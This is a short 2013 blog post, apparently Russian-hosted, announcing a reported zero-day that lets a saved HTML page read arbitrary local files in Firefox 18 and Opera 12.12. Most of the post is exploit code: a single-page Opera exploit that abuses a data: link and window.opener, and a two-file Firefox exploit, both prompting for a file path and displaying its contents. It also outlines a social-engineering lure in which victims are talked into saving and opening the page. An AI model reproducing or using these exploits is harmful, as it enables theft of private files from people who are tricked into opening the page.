четверг, 10 января 2013 г.

Russian researcher found 0day vulnerability on Firefox 18 and Opera 12.12

 Russian researcher found 0day vulnerability on Firefox 18 and Opera 12.12

Attacker can read  arbitrary file on victim host. Vulnerability is not sensitive for OS type. It must work on Windows, Linux etc.

The researcher announced about social engineering way to use this vulnerability. Attacker gives a link. A victim must save evil html-page into local computer. And then open saved evil html-page via victim browser (Firefox or Opera).


Exploit for Opera:


<html>
<body>
<script>
if((navigator.userAgent.indexOf("Opera") != -1) && (window.location.protocol == "file:")) {
 //if browser Opera and protocol is "file"
 var file=prompt("Example: C:/file.txt "); //Select file to read 
 if(file){
 console.log("File: "+file);
 document.write("<center>"+
 "<a href='data:text/html,"+ //create a link using "data" protocol
 "<script>"+
 "if(window.opener){"+ //only if "window.opener" is initialized
 "window.opener.location.replace(%22file://"+window.location.hostname+"/"+file+"%22);"+ //change the address of the parent tab on the path to read files
 "%3Cscript%3E"+ // bypass browser security using script tag
 "alert(window.opener.document.body.innerHTML);"+ //Let's see file content :)
 "%3C%2Fscript%3E"+
 "' target='_blank'>"+ //target= _blank
"CLICK-CLICK</a>");
}}
</script>
</body>
</html>


Video demonstration:





Exploit for FireFox a little more difficult to use  (must be saved in the root directory):


First file:

<html>
<body>
<script>
 if((navigator.userAgent.indexOf("Firefox") != -1) && (window.location.protocol == "file:")){
 //if browser Firefox and protocol is "file"
  document.write("<center>"+
 "<a href='./payload.html'"+ //call payload.html
 " target='_blank'>CLICK-CLICK</a>"); //target=_blank
};
 </script>
</body>
</html>



Second file:

<html>
<body>
<script>
var file=prompt('Example: C:/file.txt');
console.log(file);
window.opener.location="file://localhost/"+file;
</script>
<script>
var al=function(){alert(window.opener.document.body.innerHTML)}; //Let's see file content
while(!window.opener.document.body){ //window.opener.document.body=null
alert('Click OK'); //use alert for delay
al();
};
</script>
</body>
</html>

Video demonstration






Комментариев нет:

Отправить комментарий